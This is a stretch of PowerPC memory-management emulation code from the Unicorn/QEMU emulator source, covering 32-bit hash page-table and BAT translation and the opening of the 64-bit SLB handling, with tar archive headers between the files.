#include "mmu-hash32.h" /* #define DEBUG_BAT */ #ifdef DEBUG_BATS # define LOG_BATS(...) qemu_log_mask(CPU_LOG_MMU, __VA_ARGS__) #else # define LOG_BATS(...) do { } while (0) #endif struct mmu_ctx_hash32 { hwaddr raddr; /* Real address */ int prot; /* Protection bits */ int key; /* Access key */ }; static int ppc_hash32_pp_prot(int key, int pp, int nx) { int prot; if (key == 0) { switch (pp) { case 0x0: case 0x1: case 0x2: prot = PAGE_READ | PAGE_WRITE; break; case 0x3: prot = PAGE_READ; break; default: abort(); } } else { switch (pp) { case 0x0: prot = 0; break; case 0x1: case 0x3: prot = PAGE_READ; break; case 0x2: prot = PAGE_READ | PAGE_WRITE; break; default: abort(); } } if (nx == 0) { prot |= PAGE_EXEC; } return prot; } static int ppc_hash32_pte_prot(PowerPCCPU *cpu, target_ulong sr, ppc_hash_pte32_t pte) { CPUPPCState *env = &cpu->env; unsigned pp, key; key = !!(msr_pr ? (sr & SR32_KP) : (sr & SR32_KS)); pp = pte.pte1 & HPTE32_R_PP; return ppc_hash32_pp_prot(key, pp, !!(sr & SR32_NX)); } static target_ulong hash32_bat_size(PowerPCCPU *cpu, target_ulong batu, target_ulong batl) { CPUPPCState *env = &cpu->env; if ((msr_pr && !(batu & BATU32_VP)) || (!msr_pr && !(batu & BATU32_VS))) { return 0; } return BATU32_BEPI & ~((batu & BATU32_BL) << 15); } static int hash32_bat_prot(PowerPCCPU *cpu, target_ulong batu, target_ulong batl) { int pp, prot; prot = 0; pp = batl & BATL32_PP; if (pp != 0) { prot = PAGE_READ | PAGE_EXEC; if (pp == 0x2) { prot |= PAGE_WRITE; } } return prot; } static target_ulong hash32_bat_601_size(PowerPCCPU *cpu, target_ulong batu, target_ulong batl) { if (!(batl & BATL32_601_V)) { return 0; } return BATU32_BEPI & ~((batl & BATL32_601_BL) << 17); } static int hash32_bat_601_prot(PowerPCCPU *cpu, target_ulong batu, target_ulong batl) { CPUPPCState *env = &cpu->env; int key, pp; pp = batu & BATU32_601_PP; if (msr_pr == 0) { key = !!(batu & BATU32_601_KS); } else { key = !!(batu & BATU32_601_KP); } return ppc_hash32_pp_prot(key, pp, 0); } static hwaddr ppc_hash32_bat_lookup(PowerPCCPU *cpu, target_ulong ea, int rwx, int *prot) { CPUPPCState *env = &cpu->env; target_ulong *BATlt, *BATut; int i; LOG_BATS("%s: %cBAT v " TARGET_FMT_lx "\n", __func__, rwx == 2 ? 'I' : 'D', ea); if (rwx == 2) { BATlt = env->IBAT[1]; BATut = env->IBAT[0]; } else { BATlt = env->DBAT[1]; BATut = env->DBAT[0]; } for (i = 0; i < env->nb_BATs; i++) { target_ulong batu = BATut[i]; target_ulong batl = BATlt[i]; target_ulong mask; if (unlikely(env->mmu_model == POWERPC_MMU_601)) { mask = hash32_bat_601_size(cpu, batu, batl); } else { mask = hash32_bat_size(cpu, batu, batl); } LOG_BATS("%s: %cBAT%d v " TARGET_FMT_lx " BATu " TARGET_FMT_lx " BATl " TARGET_FMT_lx "\n", __func__, type == ACCESS_CODE ? 'I' : 'D', i, ea, batu, batl); if (mask && ((ea & mask) == (batu & BATU32_BEPI))) { hwaddr raddr = (batl & mask) | (ea & ~mask); if (unlikely(env->mmu_model == POWERPC_MMU_601)) { *prot = hash32_bat_601_prot(cpu, batu, batl); } else { *prot = hash32_bat_prot(cpu, batu, batl); } return raddr & TARGET_PAGE_MASK; } } /* No hit */ #if defined(DEBUG_BATS) if (qemu_log_enabled()) { LOG_BATS("no BAT match for " TARGET_FMT_lx ":\n", ea); for (i = 0; i < 4; i++) { BATu = &BATut[i]; BATl = &BATlt[i]; BEPIu = *BATu & BATU32_BEPIU; BEPIl = *BATu & BATU32_BEPIL; bl = (*BATu & 0x00001FFC) << 15; LOG_BATS("%s: %cBAT%d v " TARGET_FMT_lx " BATu " TARGET_FMT_lx " BATl " TARGET_FMT_lx "\n\t" TARGET_FMT_lx " " TARGET_FMT_lx " " TARGET_FMT_lx "\n", __func__, type == ACCESS_CODE ? 'I' : 'D', i, ea, *BATu, *BATl, BEPIu, BEPIl, bl); } } #endif return -1; } static int ppc_hash32_direct_store(PowerPCCPU *cpu, target_ulong sr, target_ulong eaddr, int rwx, hwaddr *raddr, int *prot) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; int key = !!(msr_pr ? (sr & SR32_KP) : (sr & SR32_KS)); qemu_log_mask(CPU_LOG_MMU, "direct store...\n"); if ((sr & 0x1FF00000) >> 20 == 0x07f) { /* * Memory-forced I/O controller interface access * * If T=1 and BUID=x'07F', the 601 performs a memory access * to SR[28-31] LA[4-31], bypassing all protection mechanisms. */ *raddr = ((sr & 0xF) << 28) | (eaddr & 0x0FFFFFFF); *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return 0; } if (rwx == 2) { /* No code fetch is allowed in direct-store areas */ cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x10000000; return 1; } switch (env->access_type) { case ACCESS_INT: /* Integer load/store : only access allowed */ break; case ACCESS_FLOAT: /* Floating point load/store */ cs->exception_index = POWERPC_EXCP_ALIGN; env->error_code = POWERPC_EXCP_ALIGN_FP; env->spr[SPR_DAR] = eaddr; return 1; case ACCESS_RES: /* lwarx, ldarx or srwcx. */ env->error_code = 0; env->spr[SPR_DAR] = eaddr; if (rwx == 1) { env->spr[SPR_DSISR] = 0x06000000; } else { env->spr[SPR_DSISR] = 0x04000000; } return 1; case ACCESS_CACHE: /* * dcba, dcbt, dcbtst, dcbf, dcbi, dcbst, dcbz, or icbi * * Should make the instruction do no-op. As it already do * no-op, it's quite easy :-) */ *raddr = eaddr; return 0; case ACCESS_EXT: /* eciwx or ecowx */ cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; env->spr[SPR_DAR] = eaddr; if (rwx == 1) { env->spr[SPR_DSISR] = 0x06100000; } else { env->spr[SPR_DSISR] = 0x04100000; } return 1; default: cpu_abort(cs, "ERROR: instruction should not need " "address translation\n"); } if ((rwx == 1 || key != 1) && (rwx == 0 || key != 0)) { *raddr = eaddr; return 0; } else { cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; env->spr[SPR_DAR] = eaddr; if (rwx == 1) { env->spr[SPR_DSISR] = 0x0a000000; } else { env->spr[SPR_DSISR] = 0x08000000; } return 1; } } hwaddr get_pteg_offset32(PowerPCCPU *cpu, hwaddr hash) { target_ulong mask = ppc_hash32_hpt_mask(cpu); return (hash * HASH_PTEG_SIZE_32) & mask; } static hwaddr ppc_hash32_pteg_search(PowerPCCPU *cpu, hwaddr pteg_off, bool secondary, target_ulong ptem, ppc_hash_pte32_t *pte) { hwaddr pte_offset = pteg_off; target_ulong pte0, pte1; int i; for (i = 0; i < HPTES_PER_GROUP; i++) { pte0 = ppc_hash32_load_hpte0(cpu, pte_offset); /* * pte0 contains the valid bit and must be read before pte1, * otherwise we might see an old pte1 with a new valid bit and * thus an inconsistent hpte value */ smp_rmb(); pte1 = ppc_hash32_load_hpte1(cpu, pte_offset); if ((pte0 & HPTE32_V_VALID) && (secondary == !!(pte0 & HPTE32_V_SECONDARY)) && HPTE32_V_COMPARE(pte0, ptem)) { pte->pte0 = pte0; pte->pte1 = pte1; return pte_offset; } pte_offset += HASH_PTE_SIZE_32; } return -1; } static void ppc_hash32_set_r(PowerPCCPU *cpu, hwaddr pte_offset, uint32_t pte1) { target_ulong base = ppc_hash32_hpt_base(cpu); hwaddr offset = pte_offset + 6; /* The HW performs a non-atomic byte update */ #ifdef UNICORN_ARCH_POSTFIX glue(stb_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + offset, ((pte1 >> 8) & 0xff) | 0x01); #else stb_phys(cpu->env.uc, CPU(cpu)->as, base + offset, ((pte1 >> 8) & 0xff) | 0x01); #endif } static void ppc_hash32_set_c(PowerPCCPU *cpu, hwaddr pte_offset, uint64_t pte1) { target_ulong base = ppc_hash32_hpt_base(cpu); hwaddr offset = pte_offset + 7; /* The HW performs a non-atomic byte update */ #ifdef UNICORN_ARCH_POSTFIX glue(stb_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + offset, (pte1 & 0xff) | 0x80); #else stb_phys(cpu->env.uc, CPU(cpu)->as, base + offset, (pte1 & 0xff) | 0x80); #endif } static hwaddr ppc_hash32_htab_lookup(PowerPCCPU *cpu, target_ulong sr, target_ulong eaddr, ppc_hash_pte32_t *pte) { hwaddr pteg_off, pte_offset; hwaddr hash; uint32_t vsid, pgidx, ptem; vsid = sr & SR32_VSID; pgidx = (eaddr & ~SEGMENT_MASK_256M) >> TARGET_PAGE_BITS; hash = vsid ^ pgidx; ptem = (vsid << 7) | (pgidx >> 10); #if 0 /* Page address translation */ qemu_log_mask(CPU_LOG_MMU, "htab_base " TARGET_FMT_plx " htab_mask " TARGET_FMT_plx " hash " TARGET_FMT_plx "\n", ppc_hash32_hpt_base(cpu), ppc_hash32_hpt_mask(cpu), hash); /* Primary PTEG lookup */ qemu_log_mask(CPU_LOG_MMU, "0 htab=" TARGET_FMT_plx "/" TARGET_FMT_plx " vsid=%" PRIx32 " ptem=%" PRIx32 " hash=" TARGET_FMT_plx "\n", ppc_hash32_hpt_base(cpu), ppc_hash32_hpt_mask(cpu), vsid, ptem, hash); #endif pteg_off = get_pteg_offset32(cpu, hash); pte_offset = ppc_hash32_pteg_search(cpu, pteg_off, 0, ptem, pte); if (pte_offset == -1) { /* Secondary PTEG lookup */ #if 0 qemu_log_mask(CPU_LOG_MMU, "1 htab=" TARGET_FMT_plx "/" TARGET_FMT_plx " vsid=%" PRIx32 " api=%" PRIx32 " hash=" TARGET_FMT_plx "\n", ppc_hash32_hpt_base(cpu), ppc_hash32_hpt_mask(cpu), vsid, ptem, ~hash); #endif pteg_off = get_pteg_offset32(cpu, ~hash); pte_offset = ppc_hash32_pteg_search(cpu, pteg_off, 1, ptem, pte); } return pte_offset; } static hwaddr ppc_hash32_pte_raddr(target_ulong sr, ppc_hash_pte32_t pte, target_ulong eaddr) { hwaddr rpn = pte.pte1 & HPTE32_R_RPN; hwaddr mask = ~TARGET_PAGE_MASK; return (rpn & ~mask) | (eaddr & mask); } int ppc_hash32_handle_mmu_fault(PowerPCCPU *cpu, vaddr eaddr, int rwx, int mmu_idx) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; target_ulong sr; hwaddr pte_offset; ppc_hash_pte32_t pte; int prot; const int need_prot[] = {PAGE_READ, PAGE_WRITE, PAGE_EXEC}; hwaddr raddr; assert((rwx == 0) || (rwx == 1) || (rwx == 2)); /* 1. Handle real mode accesses */ if (((rwx == 2) && (msr_ir == 0)) || ((rwx != 2) && (msr_dr == 0))) { /* Translation is off */ raddr = eaddr; tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, PAGE_READ | PAGE_WRITE | PAGE_EXEC, mmu_idx, TARGET_PAGE_SIZE); return 0; } /* 2. Check Block Address Translation entries (BATs) */ if (env->nb_BATs != 0) { raddr = ppc_hash32_bat_lookup(cpu, eaddr, rwx, &prot); if (raddr != -1) { if (need_prot[rwx] & ~prot) { if (rwx == 2) { cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x08000000; } else { cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; env->spr[SPR_DAR] = eaddr; if (rwx == 1) { env->spr[SPR_DSISR] = 0x0a000000; } else { env->spr[SPR_DSISR] = 0x08000000; } } return 1; } tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, prot, mmu_idx, TARGET_PAGE_SIZE); return 0; } } /* 3. Look up the Segment Register */ sr = env->sr[eaddr >> 28]; /* 4. Handle direct store segments */ if (sr & SR32_T) { if (ppc_hash32_direct_store(cpu, sr, eaddr, rwx, &raddr, &prot) == 0) { tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, prot, mmu_idx, TARGET_PAGE_SIZE); return 0; } else { return 1; } } /* 5. Check for segment level no-execute violation */ if ((rwx == 2) && (sr & SR32_NX)) { cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x10000000; return 1; } /* 6. Locate the PTE in the hash table */ pte_offset = ppc_hash32_htab_lookup(cpu, sr, eaddr, &pte); if (pte_offset == -1) { if (rwx == 2) { cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x40000000; } else { cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; env->spr[SPR_DAR] = eaddr; if (rwx == 1) { env->spr[SPR_DSISR] = 0x42000000; } else { env->spr[SPR_DSISR] = 0x40000000; } } return 1; } qemu_log_mask(CPU_LOG_MMU, "found PTE at offset %08" HWADDR_PRIx "\n", pte_offset); /* 7. Check access permissions */ prot = ppc_hash32_pte_prot(cpu, sr, pte); if (need_prot[rwx] & ~prot) { /* Access right violation */ qemu_log_mask(CPU_LOG_MMU, "PTE access rejected\n"); if (rwx == 2) { cs->exception_index = POWERPC_EXCP_ISI; env->error_code = 0x08000000; } else { cs->exception_index = POWERPC_EXCP_DSI; env->error_code = 0; env->spr[SPR_DAR] = eaddr; if (rwx == 1) { env->spr[SPR_DSISR] = 0x0a000000; } else { env->spr[SPR_DSISR] = 0x08000000; } } return 1; } qemu_log_mask(CPU_LOG_MMU, "PTE access granted !\n"); /* 8. Update PTE referenced and changed bits if necessary */ if (!(pte.pte1 & HPTE32_R_R)) { ppc_hash32_set_r(cpu, pte_offset, pte.pte1); } if (!(pte.pte1 & HPTE32_R_C)) { if (rwx == 1) { ppc_hash32_set_c(cpu, pte_offset, pte.pte1); } else { /* * Treat the page as read-only for now, so that a later write * will pass through this function again to set the C bit */ prot &= ~PAGE_WRITE; } } /* 9. Determine the real address from the PTE */ raddr = ppc_hash32_pte_raddr(sr, pte, eaddr); tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, prot, mmu_idx, TARGET_PAGE_SIZE); return 0; } hwaddr ppc_hash32_get_phys_page_debug(PowerPCCPU *cpu, target_ulong eaddr) { CPUPPCState *env = &cpu->env; target_ulong sr; hwaddr pte_offset; ppc_hash_pte32_t pte; int prot; if (msr_dr == 0) { /* Translation is off */ return eaddr; } if (env->nb_BATs != 0) { hwaddr raddr = ppc_hash32_bat_lookup(cpu, eaddr, 0, &prot); if (raddr != -1) { return raddr; } } sr = env->sr[eaddr >> 28]; if (sr & SR32_T) { /* FIXME: Add suitable debug support for Direct Store segments */ return -1; } pte_offset = ppc_hash32_htab_lookup(cpu, sr, eaddr, &pte); if (pte_offset == -1) { return -1; } return ppc_hash32_pte_raddr(sr, pte, eaddr) & TARGET_PAGE_MASK; } �������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mmu-hash32.h����������������������������������������������������������0000664�0000000�0000000�00000007756�14675241067�0020277�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef MMU_HASH32_H #define MMU_HASH32_H hwaddr get_pteg_offset32(PowerPCCPU *cpu, hwaddr hash); hwaddr ppc_hash32_get_phys_page_debug(PowerPCCPU *cpu, target_ulong addr); int ppc_hash32_handle_mmu_fault(PowerPCCPU *cpu, vaddr address, int rw, int mmu_idx); /* * Segment register definitions */ #define SR32_T 0x80000000 #define SR32_KS 0x40000000 #define SR32_KP 0x20000000 #define SR32_NX 0x10000000 #define SR32_VSID 0x00ffffff /* * Block Address Translation (BAT) definitions */ #define BATU32_BEPI 0xfffe0000 #define BATU32_BL 0x00001ffc #define BATU32_VS 0x00000002 #define BATU32_VP 0x00000001 #define BATL32_BRPN 0xfffe0000 #define BATL32_WIMG 0x00000078 #define BATL32_PP 0x00000003 /* PowerPC 601 has slightly different BAT registers */ #define BATU32_601_KS 0x00000008 #define BATU32_601_KP 0x00000004 #define BATU32_601_PP 0x00000003 #define BATL32_601_V 0x00000040 #define BATL32_601_BL 0x0000003f /* * Hash page table definitions */ #define SDR_32_HTABORG 0xFFFF0000UL #define SDR_32_HTABMASK 0x000001FFUL #define HPTES_PER_GROUP 8 #define HASH_PTE_SIZE_32 8 #define HASH_PTEG_SIZE_32 (HASH_PTE_SIZE_32 * HPTES_PER_GROUP) #define HPTE32_V_VALID 0x80000000 #define HPTE32_V_VSID 0x7fffff80 #define HPTE32_V_SECONDARY 0x00000040 #define HPTE32_V_API 0x0000003f #define HPTE32_V_COMPARE(x, y) (!(((x) ^ (y)) & 0x7fffffbf)) #define HPTE32_R_RPN 0xfffff000 #define HPTE32_R_R 0x00000100 #define HPTE32_R_C 0x00000080 #define HPTE32_R_W 0x00000040 #define HPTE32_R_I 0x00000020 #define HPTE32_R_M 0x00000010 #define HPTE32_R_G 0x00000008 #define HPTE32_R_WIMG 0x00000078 #define HPTE32_R_PP 0x00000003 static inline hwaddr ppc_hash32_hpt_base(PowerPCCPU *cpu) { return cpu->env.spr[SPR_SDR1] & SDR_32_HTABORG; } static inline hwaddr ppc_hash32_hpt_mask(PowerPCCPU *cpu) { return ((cpu->env.spr[SPR_SDR1] & SDR_32_HTABMASK) << 16) | 0xFFFF; } static inline target_ulong ppc_hash32_load_hpte0(PowerPCCPU *cpu, hwaddr pte_offset) { target_ulong base = ppc_hash32_hpt_base(cpu); #ifdef UNICORN_ARCH_POSTFIX return glue(ldl_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + pte_offset); #else return ldl_phys(cpu->env.uc, CPU(cpu)->as, base + pte_offset); #endif } static inline target_ulong ppc_hash32_load_hpte1(PowerPCCPU *cpu, hwaddr pte_offset) { target_ulong base = ppc_hash32_hpt_base(cpu); #ifdef UNICORN_ARCH_POSTFIX return glue(ldl_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + pte_offset + HASH_PTE_SIZE_32 / 2); #else return ldl_phys(cpu->env.uc, CPU(cpu)->as, base + pte_offset + HASH_PTE_SIZE_32 / 2); #endif } static inline void ppc_hash32_store_hpte0(PowerPCCPU *cpu, hwaddr pte_offset, target_ulong pte0) { target_ulong base = ppc_hash32_hpt_base(cpu); #ifdef UNICORN_ARCH_POSTFIX glue(stl_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + pte_offset, pte0); #else stl_phys(cpu->env.uc, CPU(cpu)->as, base + pte_offset, pte0); #endif } static inline void ppc_hash32_store_hpte1(PowerPCCPU *cpu, hwaddr pte_offset, target_ulong pte1) { target_ulong base = ppc_hash32_hpt_base(cpu); #ifdef UNICORN_ARCH_POSTFIX glue(stl_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + pte_offset + HASH_PTE_SIZE_32 / 2, pte1); #else stl_phys(cpu->env.uc, CPU(cpu)->as, base + pte_offset + HASH_PTE_SIZE_32 / 2, pte1); #endif } typedef struct { uint32_t pte0, pte1; } ppc_hash_pte32_t; #endif /* MMU_HASH32_H */ ������������������unicorn-2.1.1/qemu/target/ppc/mmu-hash64.c����������������������������������������������������������0000664�0000000�0000000�00000110450�14675241067�0020261�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC MMU, TLB, SLB and BAT emulation helpers for QEMU. * * Copyright (c) 2003-2007 Jocelyn Mayer * Copyright (c) 2013 David Gibson, IBM Corporation * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/units.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "mmu-hash64.h" #include "mmu-book3s-v3.h" /* #define DEBUG_SLB */ #ifdef DEBUG_SLB # define LOG_SLB(...) qemu_log_mask(CPU_LOG_MMU, __VA_ARGS__) #else # define LOG_SLB(...) do { } while (0) #endif /* * SLB handling */ static ppc_slb_t *slb_lookup(PowerPCCPU *cpu, target_ulong eaddr) { CPUPPCState *env = &cpu->env; uint64_t esid_256M, esid_1T; int n; LOG_SLB("%s: eaddr " TARGET_FMT_lx "\n", __func__, eaddr); esid_256M = (eaddr & SEGMENT_MASK_256M) | SLB_ESID_V; esid_1T = (eaddr & SEGMENT_MASK_1T) | SLB_ESID_V; for (n = 0; n < cpu->hash64_opts->slb_size; n++) { ppc_slb_t *slb = &env->slb[n]; LOG_SLB("%s: slot %d %016" PRIx64 " %016" PRIx64 "\n", __func__, n, slb->esid, slb->vsid); /* * We check for 1T matches on all MMUs here - if the MMU * doesn't have 1T segment support, we will have prevented 1T * entries from being inserted in the slbmte code. */ if (((slb->esid == esid_256M) && ((slb->vsid & SLB_VSID_B) == SLB_VSID_B_256M)) || ((slb->esid == esid_1T) && ((slb->vsid & SLB_VSID_B) == SLB_VSID_B_1T))) { return slb; } } return NULL; } void dump_slb(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; int i; uint64_t slbe, slbv; #if 0 cpu_synchronize_state(CPU(cpu)); qemu_printf("SLB\tESID\t\t\tVSID\n"); #endif for (i = 0; i < cpu->hash64_opts->slb_size; i++) { slbe = env->slb[i].esid; slbv = env->slb[i].vsid; if (slbe == 0 && slbv == 0) { continue; } #if 0 qemu_printf("%d\t0x%016" PRIx64 "\t0x%016" PRIx64 "\n", i, slbe, slbv); #endif } } void helper_slbia(CPUPPCState *env, uint32_t ih) { PowerPCCPU *cpu = env_archcpu(env); int starting_entry; int n; /* * slbia must always flush all TLB (which is equivalent to ERAT in ppc * architecture). Matching on SLB_ESID_V is not good enough, because slbmte * can overwrite a valid SLB without flushing its lookaside information. * * It would be possible to keep the TLB in synch with the SLB by flushing * when a valid entry is overwritten by slbmte, and therefore slbia would * not have to flush unless it evicts a valid SLB entry. However it is * expected that slbmte is more common than slbia, and slbia is usually * going to evict valid SLB entries, so that tradeoff is unlikely to be a * good one. * * ISA v2.05 introduced IH field with values 0,1,2,6. These all invalidate * the same SLB entries (everything but entry 0), but differ in what * "lookaside information" is invalidated. TCG can ignore this and flush * everything. * * ISA v3.0 introduced additional values 3,4,7, which change what SLBs are * invalidated. */ env->tlb_need_flush |= TLB_NEED_LOCAL_FLUSH; starting_entry = 1; /* default for IH=0,1,2,6 */ if (env->mmu_model == POWERPC_MMU_3_00) { switch (ih) { case 0x7: /* invalidate no SLBs, but all lookaside information */ return; case 0x3: case 0x4: /* also considers SLB entry 0 */ starting_entry = 0; break; case 0x5: /* treat undefined values as ih==0, and warn */ qemu_log_mask(LOG_GUEST_ERROR, "slbia undefined IH field %u.\n", ih); break; default: /* 0,1,2,6 */ break; } } for (n = starting_entry; n < cpu->hash64_opts->slb_size; n++) { ppc_slb_t *slb = &env->slb[n]; if (!(slb->esid & SLB_ESID_V)) { continue; } if (env->mmu_model == POWERPC_MMU_3_00) { if (ih == 0x3 && (slb->vsid & SLB_VSID_C) == 0) { /* preserves entries with a class value of 0 */ continue; } } slb->esid &= ~SLB_ESID_V; } } static void __helper_slbie(CPUPPCState *env, target_ulong addr, target_ulong global) { PowerPCCPU *cpu = env_archcpu(env); ppc_slb_t *slb; slb = slb_lookup(cpu, addr); if (!slb) { return; } if (slb->esid & SLB_ESID_V) { slb->esid &= ~SLB_ESID_V; /* * XXX: given the fact that segment size is 256 MB or 1TB, * and we still don't have a tlb_flush_mask(env, n, mask) * in QEMU, we just invalidate all TLBs */ env->tlb_need_flush |= (global == false ? TLB_NEED_LOCAL_FLUSH : TLB_NEED_GLOBAL_FLUSH); } } void helper_slbie(CPUPPCState *env, target_ulong addr) { __helper_slbie(env, addr, false); } void helper_slbieg(CPUPPCState *env, target_ulong addr) { __helper_slbie(env, addr, true); } int ppc_store_slb(PowerPCCPU *cpu, target_ulong slot, target_ulong esid, target_ulong vsid) { CPUPPCState *env = &cpu->env; ppc_slb_t *slb = &env->slb[slot]; const PPCHash64SegmentPageSizes *sps = NULL; int i; if (slot >= cpu->hash64_opts->slb_size) { return -1; /* Bad slot number */ } if (esid & ~(SLB_ESID_ESID | SLB_ESID_V)) { return -1; /* Reserved bits set */ } if (vsid & (SLB_VSID_B & ~SLB_VSID_B_1T)) { return -1; /* Bad segment size */ } if ((vsid & SLB_VSID_B) && !(ppc_hash64_has(cpu, PPC_HASH64_1TSEG))) { return -1; /* 1T segment on MMU that doesn't support it */ } for (i = 0; i < PPC_PAGE_SIZES_MAX_SZ; i++) { const PPCHash64SegmentPageSizes *sps1 = &cpu->hash64_opts->sps[i]; if (!sps1->page_shift) { break; } if ((vsid & SLB_VSID_LLP_MASK) == sps1->slb_enc) { sps = sps1; break; } } if (!sps) { #if 0 error_report("Bad page size encoding in SLB store: slot "TARGET_FMT_lu " esid 0x"TARGET_FMT_lx" vsid 0x"TARGET_FMT_lx, slot, esid, vsid); #endif return -1; } slb->esid = esid; slb->vsid = vsid; slb->sps = sps; #if 0 LOG_SLB("%s: " TARGET_FMT_lu " " TARGET_FMT_lx " - " TARGET_FMT_lx " => %016" PRIx64 " %016" PRIx64 "\n", __func__, slot, esid, vsid, slb->esid, slb->vsid); #endif return 0; } static int ppc_load_slb_esid(PowerPCCPU *cpu, target_ulong rb, target_ulong *rt) { CPUPPCState *env = &cpu->env; int slot = rb & 0xfff; ppc_slb_t *slb = &env->slb[slot]; if (slot >= cpu->hash64_opts->slb_size) { return -1; } *rt = slb->esid; return 0; } static int ppc_load_slb_vsid(PowerPCCPU *cpu, target_ulong rb, target_ulong *rt) { CPUPPCState *env = &cpu->env; int slot = rb & 0xfff; ppc_slb_t *slb = &env->slb[slot]; if (slot >= cpu->hash64_opts->slb_size) { return -1; } *rt = slb->vsid; return 0; } static int ppc_find_slb_vsid(PowerPCCPU *cpu, target_ulong rb, target_ulong *rt) { CPUPPCState *env = &cpu->env; ppc_slb_t *slb; if (!msr_is_64bit(env, env->msr)) { rb &= 0xffffffff; } slb = slb_lookup(cpu, rb); if (slb == NULL) { #ifdef _MSC_VER *rt = (target_ulong)(0UL - 1UL); #else *rt = (target_ulong)-1ul; #endif } else { *rt = slb->vsid; } return 0; } void helper_store_slb(CPUPPCState *env, target_ulong rb, target_ulong rs) { PowerPCCPU *cpu = env_archcpu(env); if (ppc_store_slb(cpu, rb & 0xfff, rb & ~0xfffULL, rs) < 0) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL, GETPC()); } } target_ulong helper_load_slb_esid(CPUPPCState *env, target_ulong rb) { PowerPCCPU *cpu = env_archcpu(env); target_ulong rt = 0; if (ppc_load_slb_esid(cpu, rb, &rt) < 0) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL, GETPC()); } return rt; } target_ulong helper_find_slb_vsid(CPUPPCState *env, target_ulong rb) { PowerPCCPU *cpu = env_archcpu(env); target_ulong rt = 0; if (ppc_find_slb_vsid(cpu, rb, &rt) < 0) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL, GETPC()); } return rt; } target_ulong helper_load_slb_vsid(CPUPPCState *env, target_ulong rb) { PowerPCCPU *cpu = env_archcpu(env); target_ulong rt = 0; if (ppc_load_slb_vsid(cpu, rb, &rt) < 0) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL, GETPC()); } return rt; } /* Check No-Execute or Guarded Storage */ static inline int ppc_hash64_pte_noexec_guard(PowerPCCPU *cpu, ppc_hash_pte64_t pte) { /* Exec permissions CANNOT take away read or write permissions */ return (pte.pte1 & HPTE64_R_N) || (pte.pte1 & HPTE64_R_G) ? PAGE_READ | PAGE_WRITE : PAGE_READ | PAGE_WRITE | PAGE_EXEC; } /* Check Basic Storage Protection */ static int ppc_hash64_pte_prot(PowerPCCPU *cpu, ppc_slb_t *slb, ppc_hash_pte64_t pte) { CPUPPCState *env = &cpu->env; unsigned pp, key; /* * Some pp bit combinations have undefined behaviour, so default * to no access in those cases */ int prot = 0; key = !!(msr_pr ? (slb->vsid & SLB_VSID_KP) : (slb->vsid & SLB_VSID_KS)); pp = (pte.pte1 & HPTE64_R_PP) | ((pte.pte1 & HPTE64_R_PP0) >> 61); if (key == 0) { switch (pp) { case 0x0: case 0x1: case 0x2: prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; break; case 0x3: case 0x6: prot = PAGE_READ | PAGE_EXEC; break; } } else { switch (pp) { case 0x0: case 0x6: break; case 0x1: case 0x3: prot = PAGE_READ | PAGE_EXEC; break; case 0x2: prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; break; } } return prot; } /* Check the instruction access permissions specified in the IAMR */ static int ppc_hash64_iamr_prot(PowerPCCPU *cpu, int key) { CPUPPCState *env = &cpu->env; int iamr_bits = (env->spr[SPR_IAMR] >> 2 * (31 - key)) & 0x3; /* * An instruction fetch is permitted if the IAMR bit is 0. * If the bit is set, return PAGE_READ | PAGE_WRITE because this bit * can only take away EXEC permissions not READ or WRITE permissions. * If bit is cleared return PAGE_READ | PAGE_WRITE | PAGE_EXEC since * EXEC permissions are allowed. */ return (iamr_bits & 0x1) ? PAGE_READ | PAGE_WRITE : PAGE_READ | PAGE_WRITE | PAGE_EXEC; } static int ppc_hash64_amr_prot(PowerPCCPU *cpu, ppc_hash_pte64_t pte) { CPUPPCState *env = &cpu->env; int key, amrbits; int prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; 